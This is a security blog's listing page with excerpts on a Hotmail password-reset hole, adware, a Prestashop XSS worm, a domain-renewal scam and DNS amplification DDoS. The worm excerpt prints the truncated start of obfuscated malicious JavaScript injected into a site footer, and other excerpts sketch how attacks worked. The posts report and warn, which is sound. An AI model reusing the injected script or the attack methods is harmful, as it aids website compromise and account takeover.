Security

Hotmail security hole plugged silently, no communication, no customer service

April 24, 2012 kevin Security, Windows, 1

A vulnerability in the Hotmail password reset pages, that allowed hackers to get access to ANY hotmail/MSN account, has been widely exploited over the past week. I found a video on Youtube dated April 12, which describes the security hole, which is trivial and only needs the modification of 1 email field during a request […]

hotmail, hotmail blocked, hotmail vulnerability, microsoft, password reset

Thepiratebay.se links blocked in MSN Messenger

March 9, 2012 kevin Security, 0

UPDATE 28/03/2012: TheRegister has published an article about it and it seems MS decided to unban thepiratebay! http://www.theregister.co.uk/2012/03/26/microsoft_censors_pirate_bay_im/ ——– Looks like thepiratebay.se links are blocked in MSN messenger, anybody who tries to send a link, even of the homepage, receives back an error: I’d be curious to know if it has been mistakenly categorized as […]

blocked, msn, msn messenger, thepiratebay, thepiratebay.se

Vshare / Widdit / searchcompletion.com Adware

October 22, 2011 kevin General, Security, 1

Vshare plugin *IS* an adware. Whether you are on Mac, Windows or Linux this is the same, and you don’t even need the toolbar, only the plugin. I’ve installed the old version of the Vshare plugin on my Firefox, on Linux, (old version because the newest isn’t available on Linux) then some popups started to […]

adware, search.searchcompletion.com, searchcompletion, vshare, vshare.tv, widdit, widdit.com

Prestashop XSS Worm (footer.tpl virus)

August 24, 2011 kevin Security, Web applications, 1

Today i woke up and connected to a Prestashop site i’m setting up. I didn’t install anything extra on it (only my custom template), also it wasn’t in search engines. I noticed a strange blank line in the footer.. DOH! When i looked, i had this code in the footer: <script>String.prototype.asd=function(){return String.fromCharCode;}; Object.prototype.asd=”e”;try{for(i in{})if(~i.indexOf(‘as’))throw 1;} […]

footer.tpl virus, prestashop, prestashop footer.tpl virus, prestashop virus, prestashop worm, prestashop xss

The domainrenewal (domainrenewalgroup.com) scam

July 6, 2011 kevin Domain names, Security, 0

OK this is already everywhere on internet for years, but i really had to write a post about it as these guys are spamming my mailbox every year. This company is trying to convince people into believing they need to renew (and obviously transfer) their domain names with them. Their paper looks very professional, and […]

Domain Registry of America, domain renewal, domain renewal scam, domainrenewal, domainrenewalgroup, scam

New DDoS attacks exploit recursive DNS Servers

January 23, 2009 kevin Security, 0

Looks like some people are exploiting recursive DNS servers to conduct DDoS attacks. How? Simple: Some spoofed DNS requests appear to be sent from a victim host, they usually request for “.” (the root zone as it has a long answer) or a specific domain, if the DNS server is badly configured it will send […]